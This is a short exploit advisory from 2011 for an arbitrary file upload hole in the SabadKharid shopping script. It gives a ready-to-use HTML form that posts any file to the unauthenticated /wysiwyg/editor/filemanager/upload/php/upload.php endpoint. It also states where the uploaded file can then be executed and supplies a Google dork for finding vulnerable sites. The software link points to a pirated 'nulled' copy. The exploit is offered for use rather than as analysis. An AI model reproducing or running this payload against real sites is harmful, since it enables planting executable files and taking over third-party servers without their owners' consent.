+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Author : St493r
[#] Contact : St493r@gmail.com
[#] Title : SabadKharid Remote Arbitrary File Upload Exploit
[#] Vendor : http://sabadkharid.com
[#] Software : http://dl.p30vel.ir/scripts/sabadkharid-professional-nulled-p30vel.zip
[#] Tested On : Linux
[#] Date : 28 - 09 - 2011
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Vulnerability File : /wysiwyg/editor/filemanager/upload/php/upload.php
[#] Exploit : Exploit.html
<strong>SabadKharid Remote Arbitrary File Upload Exploit</strong>
<form enctype="multipart/form-data" action="
http://TARGET/wysiwyg/editor/filemanager/upload/php/upload.php?Type=Media"
method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>
You can execute your uploaded file from : http://TARGET/userfiles/yourfile
You can upload any file with any suffic
Google dork : Powered by Sabadkharid , inurl:"index.php?register"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Thanks To All Iranian Hackers
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
